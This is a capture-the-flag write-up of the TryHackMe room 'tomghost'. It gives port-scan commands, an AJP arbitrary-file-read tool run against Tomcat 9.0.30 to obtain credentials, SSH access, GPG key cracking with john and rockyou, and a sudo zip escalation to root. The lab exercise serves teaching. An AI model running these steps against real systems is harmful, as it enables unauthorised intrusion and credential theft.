tomghost
Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.

As the description says, it is an Easy room from tryHacMe. Though the initial access was easy, but the Privilege escalation part is quite hard and tricky.
Enumeration
1) First, masscan all port scan: masscan -e eth0 -p 1-65535 --rate=10000 -v 10.10.187.215
Discovered open port 22/tcp on 10.10.187.215
Discovered open port 8080/tcp on 10.10.187.215
Discovered open port 53/tcp on 10.10.187.215
Discovered open port 8009/tcp on 10.10.187.215
2) Now nmap scan: nmap -p 22,8080,53,8009 -sC -sV -v 10.10.187.215
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
| 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (EdDSA)
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/9.0.30
The Tomcat 9.0.30 here, has an arbitrary file read vulnerability: exploit-db
3) Visiting the webpage at port 8080 confirms the version:

4) Found a tool to read sensitive files using tomcat vulnerability: GitHub Link
5) Set up the tools with execute permission:

Now run the tool: ./ajpShooter.py
http://10.10.187.215:8080
8009 /WEB-INF read
IP:8080 : tomcat running in this address
8009 : enumerating the Jserv service running in port 8009
/WEB-INF : querying web information
read : read and show the info
Found an /index.txt
6) Tried to read a common file:
./ajpShooter.py
http://10.10.187.215:8080
8009 /WEB-INF/web.xml read
There found a name:password combination

Exploitation
7) Easily exploited using ssh: ssh skyfuck@10.10.187.215

8) The user.txt is in another user directory

Privilege escalation
9) Failed attempt
can not list the user with sudo access : sudo -l
/etc/shadow and /etc/passwd has no write access
can not download and run any automation tool inside the machine
skyfuck has no sudo access but merlin has
10) I have failed using other way to enumerate. But I found that there is pgp (Pretty Good Privacy) file and ASCII armour

11) First trying to import the ASCII armour as a key: gpg --import tryhackme.asc
then trying to decrypt the pgp: gpg --decrypt credential.pgp
(But this also asks for passphrase)

12) Downloading the .asc in attack box and try to convert. This gives me a hash
Download:
scp skyfuck@10.10.187.215:tryhackme.asc /tmp
Convert:
/opt/john/gpg2john /tmp/tryhackme.asc > /tmp/hash

13) Cracking the hash: john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt /tmp/hash

14) Now paste it to the another running shell of the machine. This shows merlin's password

15) I can log in as merlin : su merlin
and merlin has sudo access: sudo -l
(to zip)
16) GTFOBins shows the payload using zip. I have modified a little and this gives me root access

Last updated
Was this helpful?